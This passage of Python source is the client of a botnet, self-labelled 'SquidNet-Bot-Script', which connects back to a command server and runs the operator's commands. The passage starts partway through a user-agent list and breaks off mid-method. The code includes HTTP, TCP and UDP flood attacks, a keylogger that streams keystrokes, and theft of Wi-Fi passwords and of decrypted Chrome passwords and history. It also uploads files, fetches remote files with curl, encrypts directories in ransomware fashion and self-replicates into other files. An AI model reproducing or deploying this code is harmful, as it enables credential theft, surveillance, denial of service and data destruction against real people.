'Links (2.1pre20; SunOS 5.10 sun4u; 80x22)',
'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7i',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8) Gecko/20060202 Firefox/1.5',
'Opera/8.51 (X11; Linux i386; U; de)', 'Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i386--freebsd; X11)',
'Links (0.96; OpenBSD 3.0 sparc)', 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6c',
'Lynx/2.8.3rel.1 libwww-FM/2.14',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)', 'libwww-perl/5.79',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.12) Gecko/20050919 Firefox/1.0.7',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)',
'msnbot/1.0 (+http://search.msn.com/msnbot.htm)', 'Googlebot/2.1 (+http://www.google.com/bot.html)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051008 Firefox/1.0.7',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.51',
'Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.3 (like Gecko)',
'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7c',
'Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/4.8 [en] (Windows NT 5.1; U)', 'Opera/8.51 (Windows NT 5.1; U; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Opera/8.51 (Windows NT 5.1; U; en;VWP-online.de)',
'sproose/0.1-alpha (sproose crawler; http://www.sproose.com/bot.html; crawler@sproose.com)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0,gzip(gfe) (via translate.google.com)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'BrowserEmulator/0.9 see http://dejavu.org',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.4) Gecko/20030624',
'iCCrawler (http://www.iccenter.net/bot.htm)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)',
'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.12) Gecko/20051013 Debian/1.7.12-1ubuntu1',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8) Gecko/20051111 Firefox/1.5',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.50',
'Mozilla/3.0 (x86 [de] Windows NT 5.0; Sun)', 'Java/1.4.1_04',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5',
'msnbot/0.9 (+http://search.msn.com/msnbot.htm)',
'NutchCVS/0.8-dev (Nutch running at UW; http://www.nutch.org/docs/en/bot.html; sycrawl@cs.washington.edu)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-14.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.53',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.4) Gecko/20030619 Netscape/7.1 (ax)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)', 'Mozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)',
'Mozilla/4.0 (compatible; MSIE 5.5; AOL 7.0; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)', 'Opera/8.53 (Windows NT 5.1; U; en)',
'Opera/8.01 (Windows NT 5.0; U; de)', 'Opera/8.54 (Windows NT 5.1; U; de)',
'Opera/8.53 (Windows NT 5.0; U; en)', 'Opera/8.01 (Windows NT 5.1; U; de)',
'Opera/8.50 (Windows NT 5.1; U; de)',
'Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322',
'Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)',
'Mozilla/4.0 (compatible; Cerberian Drtrs Version-3.2-Build-0)',
'Mozilla/4.0 (compatible; AvantGo 6.0; FreeBSD)', 'Mozilla/4.5 [de] (Macintosh; I; PPC)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcIA; MPLUS)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {59FC8AE0-2D88-C929-DA8D-B559D01826E7}; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; snprtz|S04741035500914#914|isdn; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EnergyPlugIn; dial)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.02b)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; SV1; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ringo; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.1.4322; yplus 4.1.00b)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; YPC 3.2.0)',
'Mozilla/4.0 (compatible; MSIE 6.0; AOL 7.0; Windows NT 5.1; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; BUILDWARE 1.6; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; HbTools 4.7.5)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; (R1 1.5)',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; it)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; FunWebProducts; HbTools 4.7.5)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Tablet PC 1.7)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312469)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; SV1; FDM)',
'Mozilla/5.0 (Macintosh; U; PPC; de-DE; rv:1.0.2)', 'Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1)',
'Mozilla/5.0 (compatible; Konqueror/3.4; Linux 2.6.14-kanotix-9; X11)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Win98; de; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6)',
'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; de; rv:1.8.0.1)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.1)',
'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4.1)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.3)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.12)',
'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1)', 'Mozilla/5.0 (X11; Linux i686; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.6)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.1)',
'Mozilla/5.0 (compatible; Konqueror/3; Linux)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)',
'Mozilla/5.0 (compatible; Konqueror/3.2; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; tg)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.8b4)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51']
return user_agents
def stop_atk(self):
self.stopatk = True
def build_querystr(self, value):
result = ''
for i in range(value):
item = random.randint(65, 100)
result += chr(item)
return result
def ddos(self):
if not self.stopatk:
try:
code = 0
agent = random.choice(self.useragents)
req = urllib.request.Request(self.ip, headers={'User-Agent': agent,
'Referer': random.choice(
self.referers) + self.build_querystr(
random.randint(50, 100)),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive': random.randint(110, 160),
'Connection': 'keep-alive'})
urllib.request.urlopen(req)
code = 200
except urllib.error.HTTPError as e:
code_split = str(e).split()
code = code_split[2]
code = str(code[0] + code[1] + code[2])
if "500" in str(e):
code = 500
elif "429" in str(e):
code = 500
elif code.startswith('5'):
code = 500
except urllib.error.URLError as e:
if "A connection attempt failed" in str(e):
code = 500
except:
pass
return code
def start_thr(self):
while True:
try:
x = threading.Thread(target=self.ddos)
x.start()
time.sleep(self.delay)
if self.stopatk:
break
except:
pass
def ddos_start(self):
while True:
try:
http_code = self.ddos()
if http_code == 500:
break
if self.stopatk:
break
except:
pass
class TCP_UDP_Flood:
def __init__(self, ip, port, delay, pkt_size):
self.ip = ip
self.port = int(port)
self.delay = float(delay)
self.pkt_size = int(pkt_size)
self.stop = False
def gen_packet(self, size):
return random._urandom(size)
def UDP_Req(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(self.gen_packet(self.pkt_size), (self.ip, self.port))
s.close()
except:
pass
def TCP_req(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.ip, self.port))
s.send(self.gen_packet(self.pkt_size))
s.close()
except:
pass
def Stop_Atk(self):
self.stop = True
def TCP_Flood(self):
while True:
try:
tcp_req = threading.Thread(target=self.TCP_req)
tcp_req.start()
if self.stop:
break
time.sleep(self.delay)
except:
pass
def UDP_Flood(self):
while True:
try:
udp_req = threading.Thread(target=self.UDP_Req)
udp_req.start()
if self.stop:
break
time.sleep(self.delay)
except:
pass
class Bot:
def __init__(self, ip, port, key):
self.ip = ip
self.port = port
self.msg = ""
self.name = os.popen("whoami").read().strip()
if sys.platform == "win32":
self.desktop = f"C:/Users/{os.getlogin()}/Desktop"
elif sys.platform == "darwin":
self.desktop = f"/Users/{self.name}/Desktop"
else:
self.desktop = f"/"
self.logging = False
self.file_saving = False
while True:
try:
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((self.ip, self.port))
break
except:
self.connection.close()
time.sleep(1)
try:
logger = threading.Thread(target=self.start_logging)
logger.start()
except:
pass
self.fileeditor = False
time.sleep(1)
msg = socket.gethostname()+" "+self.getip()+" "+os.getlogin()+" "+sys.platform
self.send(msg)
time.sleep(1)
self.send("!CLIENTLOG")
self.recv_thr = threading.Thread(target=self.recv)
self.recv_thr.start()
self.conntest = threading.Thread(target=self.conn_test)
self.conntest.start()
self.key = key
try:
self.fernet_session = Fernet(self.key)
except:
self.fernet_session = None
def getip(self):
try:
url = 'https://httpbin.org/ip'
req = urllib.request.Request(url)
result = urllib.request.urlopen(req)
try:
result = result.read().decode()
except:
result = result.read()
contents = result.split()
ip = contents[2].strip('"')
return ip
except:
pass
def send(self, msg):
try:
self.connection.send(msg.encode())
except:
self.connection.send(msg)
def recv(self):
while True:
try:
self.msg = self.connection.recv(1024)
try:
self.msg = self.msg.decode()
except:
pass
self.run_cmd()
except:
pass
def on_press(self, key):
if self.logging:
try:
self.send("!sendkey " + str(key))
except:
pass
def on_release(self, key):
pass
def start_logging(self):
try:
with Listener(on_press=self.on_press, on_release=self.on_release) as listener:
listener.join()
except:
pass
def obtainwifipass(self):
if sys.platform == "darwin":
self.send("This bot is on a Apple-based product. Unable to get wifi passwords!")
else:
item = subprocess.run(["netsh", "wlan", "show", "profiles"], capture_output=True).stdout.decode()
prof_names = (re.findall("All User Profile : (.*)\\r", item))
passwords = []
check_networks = []
for i in prof_names:
item = subprocess.run(["netsh", "wlan", "show", "profiles", i], capture_output=True).stdout.decode()
security_key = False
security_key_present = (re.findall("Security key : (.*)\\r", item))
if security_key_present[0] == "Present":
check_networks.append(i)
else:
pass
for i in check_networks:
item = subprocess.run(["netsh", "wlan", "show", "profiles", i, "key=clear"],
capture_output=True).stdout.decode()
wifi_pass = (re.findall("Key Content : (.*)", item))
wifi_pass = wifi_pass[0]
info = {'ssid': i, 'key': wifi_pass.strip()}
passwords.append(info)
main_msg = ""
for i in passwords:
main_msg = main_msg + str(i) + ","
main_msg = f"Wifi Passwords: {main_msg}"
return main_msg
def openfile(self, file):
try:
if sys.platform == "darwin":
os.system(f"open {file}")
else:
os.startfile(file)
except:
pass
def changedir(self, dir):
try:
os.chdir(dir)
except:
pass
def getinfo(self):
msg = f'''
IP: {self.getip()}
CWD: {os.getcwd()}
USERNAME: {os.getlogin()}
OS: {sys.platform}
'''
return msg
def returnsecondstr(self, msg):
instruction = msg.split()
secondstr = instruction[1]
return secondstr
def rmdir(self, dir):
try:
shutil.rmtree(dir)
except:
pass
def rmfile(self, file):
try:
os.remove(file)
except:
pass
def mkdir(self, dirname):
try:
os.mkdir(dirname)
except:
pass
def listdir(self):
try:
dirlist = os.listdir()
result = ""
item = 0
dir_count = len(dirlist)
for i in dirlist:
if item == dir_count:
result += f"{i}"
else:
result += f"{i}, "
item += 1
return result
except:
pass
def sendfile(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
self.send(content)
time.sleep(5)
self.send("finished".encode())
except:
pass
def file_content(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
self.send(content)
except:
pass
def encdir(self):
for i in os.listdir():
try:
file = open(i, 'rb')
content = file.read()
file.close()
enc_content = self.fernet_session.encrypt(content)
file = open(i, 'wb')
file.write(enc_content)
file.close()
except:
pass
def decdir(self):
for i in os.listdir():
try:
file = open(i, 'rb')
content = file.read()
file.close()
dec_content = self.fernet_session.decrypt(content)
file = open(i, 'wb')
file.write(dec_content)
file.close()
except:
pass
def encfile(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
enc_content = self.fernet_session.encrypt(content)
file = open(filename, 'wb')
file.write(enc_content)
file.close()
except:
pass
def decfile(self, filename):
try:
file = open(filename, 'rb')
content = file.read()
file.close()
dec_content = self.fernet_session.decrypt(content)
file = open(filename, 'wb')
file.write(dec_content)
file.close()
except:
pass
def getfrinternet(self, src ,filetocreate):
try:
output = os.popen(f"curl {src} -o {filetocreate}").read()
self.send(f"Created {filetocreate} into {os.getcwd()}")
except:
pass
def conn_test(self):
connected = True
while True:
try:
if connected:
self.send(" ")
time.sleep(1)
except:
connected = False
while True:
try:
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((self.ip, self.port))
msg = socket.gethostname() + " " + self.getip() + " " + os.getlogin() + " " + sys.platform
self.send(msg)
time.sleep(1)
self.send("!CLIENTLOG".encode())
time.sleep(1)
connected = True
break
except:
pass
try:
logger = threading.Thread(target=self.start_logging)
logger.start()
except:
pass
def get_encryption_key(self):
local_state_path = os.path.join(os.environ["USERPROFILE"],
"AppData", "Local", "Google", "Chrome",
"User Data", "Local State")
with open(local_state_path, "r", encoding="utf-8") as f:
local_state = f.read()
local_state = json.loads(local_state)
key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
key = key[5:]
return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
def decrypt_password(self,password, key):
try:
iv = password[3:15]
password = password[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
return ""
def main_password_yoinker(self):
msgtoserv = ""
key = self.get_encryption_key()
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "default", "Login Data")
filename = "ChromeData.db"
shutil.copyfile(db_path, filename)
db = sqlite3.connect(filename)
cursor = db.cursor()
cursor.execute(
"select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
for row in cursor.fetchall():
origin_url = row[0]
action_url = row[1]
username = row[2]
password = self.decrypt_password(row[3], key)
if username or password:
msgtoserv += f"\\nOrigin Url: {origin_url}\\nAction Url: {action_url}\\nUsername: {username}\\nPassword: {password}\\n"
else:
continue
cursor.close()
db.close()
try:
os.remove(filename)
except:
pass
return msgtoserv
def gotowebsite(self, website):
if sys.platform == "win32":
os.system(f'start {website}')
else:
os.system(f'open {website}')
def clone(self):
file_ending = sys.argv[0].split(".")
file_ending = file_ending[len(file_ending) - 1]
if "py" in file_ending:
own_file = open(sys.argv[0], "r")
own_content = own_file.readlines()
own_file.close()
lines = []
in_code = False
for line in own_content:
if "#-----SquidNet-Bot-Script-----#" in line:
in_code = True
if in_code:
lines.append(line)
if "#-----End-Of-Bot-----#" in line:
in_code = False
break
else:
own_file = open(sys.argv[0], "rb")
own_content = own_file.read()
own_file.close()
if sys.platform == "win32":
main_dir = f"C:/Users/{os.getlogin()}/"
else:
main_dir = f"/Users/{self.name}/"
os.chdir(main_dir)
workingdirs = []
workingdirs.append(main_dir)
workingdirs.append(os.getcwd())
dirlist = os.listdir()
for dirs in dirlist:
if "." in dirs:
pass
else:
workingdirs.append(main_dir + str(dirs))
dirlist = os.listdir()
for dirs in workingdirs:
try:
os.chdir(dirs)
except:
pass
for files in dirlist:
try:
if '.'+file_ending in files:
if "py" in file_ending:
file = open(files, "r")
content = file.readlines()
file.close()
if "#-----SquidNet-Bot-Script-----#" in content:
pass
else:
file = open(files, "w")
file.writelines(lines)
file.writelines("\\n\\n")
file.writelines(content)
file.close()
else:
file = open(files, "rb")
content = file.read()
file.close()
if own_content in content:
pass
else:
file = open(files, "wb")
file.write(own_content + "\\n\\n".encode())
file.write(content)
file.close()
except:
pass
def gotowebsite(self, website):
if sys.platform == "win32":
os.system(f'start {website}')
else:
os.system(f'open {website}')
def send_history(self):
dirs = os.getcwd()
if sys.platform == "win32":
os.chdir(f"C:/Users/{os.getlogin()}/AppData/Local/Google/Chrome/User Data/Default/")
elif sys.platform == "darwin":
os.chdir(f"/Users/{self.name}/Library/Application Support/Google/Chrome/User Data/Default/")
shutil.copyfile("History", dirs + "/History.db")
os.chdir(dirs)
History = sqlite3.connect("History.db")
cursor = History.cursor()
e = cursor.execute("SELECT last_visit_time, visit_count, title, url from urls")
for i in cursor.fetchall():
time = i[0]
visit_count = i[1]
url = i[3]
title = i[2]
epoch = datetime(1601, 1, 1)
url_time = epoch + timedelta(microseconds=time)
self.send(f"({url_time}) ({visit_count}) ({title}) ({url})".encode())
cursor.close()
History.close()
os.remove("History.db")
def run_cmd(self):
try:
if self.fileeditor:
if self.msg.startswith("!stopedit"):
self.send(f"File editor closed for {self.filename}.")
self.fileeditor = False
else:
try:
self.msg = "\\n" + self.msg
except:
self.msg = "\\n".encode() + self.msg
self.file = open(self.filename, "rb")
contents = self.file.read()
self.file.close()
self.file = open(self.filename, "wb")
self.file.write(contents)
self.file.write(self.msg.encode())
self.file.close()
else:
if self.msg.startswith('!httpflood'):
msg = self.msg.split()
ip = msg[1]
delay = float(msg[2])
self.dos = DDoS(ip, delay)
elif self.msg.startswith('!stopatk'):
try:
self.dos.stop_atk()
except:
pass
try:
self.tcpflood.Stop_Atk()
except:
pass
try:
self.udpflood.Stop_Atk()
except:
pass
elif self.msg.startswith('!cloneself'):
cloner = threading.Thread(target=self.clone)
cloner.start()
self.connection.send("Successfully replicated files.".encode())
elif self.msg.startswith('!changedirdesktop'):
self.changedir(self.desktop)
elif self.msg.startswith('!openfile'):
file = self.returnsecondstr(self.msg)
self.openfile(file)
elif self.msg.startswith('!changedir'):
dir = self.returnsecondstr(self.msg)
self.changedir(dir)
elif self.msg.startswith('!rmdir'):
dir = self.returnsecondstr(self.msg)
self.rmdir(dir)
elif self.msg.startswith('!rmfile'):
file = self.returnsecondstr(self.msg)
self.rmfile(file)
elif self.msg.startswith('!listdir'):
dirlist = self.listdir()
self.send(dirlist)
elif self.msg.startswith('!encdir'):
self.encdir()
elif self.msg.startswith('!decdir'):
self.decdir()
elif self.msg.startswith('!encfile'):
file = self.returnsecondstr(self.msg)
self.encfile(file)
elif self.msg.startswith('!decfile'):
file = self.returnsecondstr(self.msg)
self.decfile(file)
elif self.msg.startswith('!getinfo'):
msgtoserv = self.getinfo()
self.send(msgtoserv)
elif self.msg.startswith('!getip'):
self.send(self.getip())
elif self.msg.startswith("!keylog"):
if self.logging:
pass
else:
self.send("Started to send keyboard inputs.")
self.logging = True
elif self.msg.startswith("!stopkeylog"):
if self.logging:
self.send("Stopped Keylogging.")
self.logging = False
elif self.msg.startswith('!getwifi'):
wifi_passwords = self.obtainwifipass()
self.send(wifi_passwords)
elif self.msg.startswith('!savefile'):
file = self.returnsecondstr(self.msg)
self.sendfile(file)
elif self.msg.startswith('!viewfilecontent'):
file = self.returnsecondstr(self.msg)
self.file_content(file)
elif self.msg.startswith("!getchromehistory"):
self.send_history()
elif self.msg.startswith('!mkdir'):
main_msg = self.msg.split()
dirname = main_msg[1]
self.mkdir(dirname)
self.send(f"Successfully Created {dirname}")
elif self.msg.startswith('!getcwd'):
self.send(os.getcwd())
elif self.msg.startswith('!getos'):
self.send(sys.platform)
elif self.msg.startswith('!gotowebsite'):
main_msg = self.msg.split()
url = main_msg[1]
self.gotowebsite(url)
elif self.msg.startswith('!dwnldfile'):
main_msg = self.msg.split()
src = main_msg[1]
file = main_msg[2]
self.getfrinternet(src, file)
elif self.msg.startswith('!getpasswords'):
if sys.platform == "win32":
passwords = self.main_password_yoinker()
self.connection.send(passwords.encode())
else:
self.connection.send("Running on a non-windows machine - Cannot get passwords!")
elif self.msg.startswith("!editfile"):
try:
main_msg = self.msg.split()
self.editfile = open(str(main_msg[1]), "rb")
self.editfile.close()
self.filename = self.editfile.name
